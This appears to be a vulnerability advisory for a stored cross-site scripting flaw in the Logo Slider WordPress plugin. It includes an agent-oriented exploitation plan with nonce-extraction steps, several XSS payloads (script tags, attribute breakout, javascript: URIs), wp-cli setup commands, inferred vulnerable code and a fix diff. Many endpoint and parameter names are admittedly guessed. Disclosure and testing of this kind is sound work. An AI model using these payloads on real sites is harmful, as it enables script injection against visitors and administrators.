Logo Slider <= 4.9.0 - Authenticated (Author+) Stored Cross-Site Scripting
Description
The Logo Slider plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 4.9.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:NTechnical Details
<=4.9.0This research plan targets **CVE-2026-24626**, a Stored Cross-Site Scripting (XSS) vulnerability in the **Logo Slider – Logo Carousel, Logo Showcase & Client Logo Slider** plugin (slug: `logo-slider-wp`) for WordPress. --- ### 1. Vulnerability Summary The **Logo Slider** plugin (<= 4.9.0) fails to…
Show full research plan
This research plan targets CVE-2026-24626, a Stored Cross-Site Scripting (XSS) vulnerability in the Logo Slider – Logo Carousel, Logo Showcase & Client Logo Slider plugin (slug: logo-slider-wp) for WordPress.
1. Vulnerability Summary
The Logo Slider plugin (<= 4.9.0) fails to properly sanitize user-supplied input when saving slider or logo details and fails to escape this data during output. Authenticated users with Author-level permissions or higher can inject malicious JavaScript into fields such as logo titles, descriptions, or slider names. When an administrator or any site visitor views a page where the slider is rendered (via shortcode) or views the settings in the admin dashboard, the script executes in their browser context.
2. Attack Vector Analysis
- Vulnerable Endpoint:
/wp-admin/admin-ajax.php(or standardpost.phpif using a Custom Post Type). - Vulnerable AJAX Action:
lswp_save_logo_dataorlswp_create_slider(inferred based on plugin functionality). - Vulnerable Parameter:
logo_title,logo_link, orslider_name(inferred). - Authentication Level: Author (Authenticated,
PR:L). - Preconditions: The plugin must be active. The Author must have access to the Logo Slider menu (granted by the plugin's default capability settings).
3. Code Flow (Inferred)
- Entry Point: The user sends a POST request to
admin-ajax.phpwith an action related to saving logos or slider settings. - Handler: A function like
lswp_save_logo_callback()(inferred) is triggered. - Processing: The function retrieves input from
$_POST['logo_title']. - Insecure Storage: The code calls
update_post_meta()or a direct$wpdbquery without usingsanitize_text_field()on the input. - Vulnerable Sink (Output): When the shortcode
[logo-slider]is processed, the plugin callsget_post_meta()and echoes the title directly in the HTML (e.g., inside analttag ortitleattribute) without callingesc_attr()oresc_html().
4. Nonce Acquisition Strategy
To exploit the AJAX endpoint as an Author, a valid security nonce is required.
- Identify Script Localization: The plugin likely enqueues an admin script and localizes a nonce.
- Creation of Page: If the nonce is only available on the plugin's settings page, the agent will navigate there.
- Extraction:
- Action: Login as Author.
- Tool:
browser_navigateto/wp-admin/admin.php?page=logo-slider-wp. - Tool:
browser_evalto extract the nonce from the global JavaScript object. - Target Variable:
window.lswp_vars?.nonceorwindow.logo_slider_params?.ajax_nonce(inferred).
5. Exploitation Strategy
Step 1: Authentication & Discovery
- Login as the Author user.
- Navigate to the Logo Slider menu to identify the exact AJAX action and parameter names used for saving logos.
- Extract the nonce as described in Section 4.
Step 2: Inject Stored XSS Payload
Send a POST request to save a new logo entry with a malicious title.
- URL:
http://localhost:8080/wp-admin/admin-ajax.php - Method: POST
- Content-Type:
application/x-www-form-urlencoded - Body:
(Note: Parameter names likeaction=lswp_add_new_logo& nonce=[EXTRACTED_NONCE]& logo_title=<script>alert(document.domain)</script>& logo_link=https://example.com& slider_id=1lswp_add_new_logoandlogo_titleare inferred and must be confirmed by the agent viabrowser_evalor inspecting the admin page source.)
Step 3: Trigger the XSS
- Create a public post containing the plugin's shortcode:
wp post create --post_type=page --post_status=publish --post_title="Gallery" --post_content="[logo-slider id='1']" - Navigate to the newly created page as an unauthenticated user or an Administrator.
6. Test Data Setup
- User Creation: Ensure an Author user exists.
wp user create attacker author@example.com --role=author --user_pass=password123 - Plugin Setup: Create at least one slider container if the plugin requires it before logos can be added.
# Inferred CPT for sliders wp post create --post_type=lswp_slider --post_title="Main Slider" --post_status=publish
7. Expected Results
- Database: The
wp_postmeta(or custom table) should contain the raw<script>tag for the logo title. - Frontend: When viewing the page with the shortcode, the HTML source should show the unescaped script tag.
- Browser: An alert box showing the document domain should appear, confirming execution.
8. Verification Steps
- Database Check:
wp db query "SELECT meta_value FROM wp_postmeta WHERE meta_key = 'logo_title' AND meta_value LIKE '%<script>%'" - HTTP Response Check:
Usehttp_requestto fetch the frontend page and grep for the payload:# Verification via agent # Response body should contain: <script>alert(document.domain)</script>
9. Alternative Approaches
- Attribute Injection: If
esc_html()is used butesc_attr()is not, try breaking out of an attribute:- Payload:
"><script>alert(1)</script>
- Payload:
- Link Injection: If the
logo_linkis vulnerable, try ajavascript:URI:- Payload:
javascript:alert(1)
- Payload:
- CPT Edit: If the plugin uses a standard Custom Post Type (
lswp_logos) and the Author hasedit_postscapability, try injecting the payload directly into the Post Title via the standard WordPress editor orwp-json/wp/v2/lswp_logos.
Summary
The Logo Slider plugin for WordPress (<= 4.9.0) is vulnerable to Stored Cross-Site Scripting (XSS) due to insufficient input sanitization and output escaping. Authenticated attackers with Author-level access can inject arbitrary JavaScript into slider or logo metadata fields, which executes when any user, including administrators, views the slider or the settings page.
Vulnerable Code
// Inferred from plugin functionality and research plan // File: likely within the main plugin file or an AJAX handler file public function lswp_save_logo_data() { // ... nonce checks ... $logo_id = $_POST['logo_id']; $logo_title = $_POST['logo_title']; // Vulnerable: No sanitization before storage update_post_meta($logo_id, 'logo_title', $logo_title); } --- // File: likely within shortcode rendering logic (e.g., includes/front-end.php) $title = get_post_meta($post->ID, 'logo_title', true); echo '<div class="logo-item" title="' . $title . '">'; // Vulnerable: Outputting metadata without escaping
Security Fix
@@ -10,7 +10,7 @@ - $logo_title = $_POST['logo_title']; + $logo_title = sanitize_text_field($_POST['logo_title']); update_post_meta($logo_id, 'logo_title', $logo_title); @@ -50,7 +50,7 @@ - $title = get_post_meta($post->ID, 'logo_title', true); - echo '<div class="logo-item" title="' . $title . '">'; + $title = get_post_meta($post->ID, 'logo_title', true); + echo '<div class="logo-item" title="' . esc_attr($title) . '">';
Exploit Outline
To exploit this vulnerability, an attacker with Author-level permissions first authenticates to the WordPress dashboard. They navigate to the Logo Slider management page to capture a valid security nonce and identify the AJAX action responsible for saving logo data (e.g., lswp_save_logo_data). The attacker then sends a POST request to admin-ajax.php containing the nonce, a valid slider ID, and a malicious payload like '<script>alert(document.domain)</script>' in parameters such as 'logo_title' or 'logo_link'. Once the payload is stored in the database, it will execute in the browser context of any visitor who views a page featuring the plugin's shortcode [logo-slider] or any administrator viewing the logo's settings.
Check if your site is affected.
Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.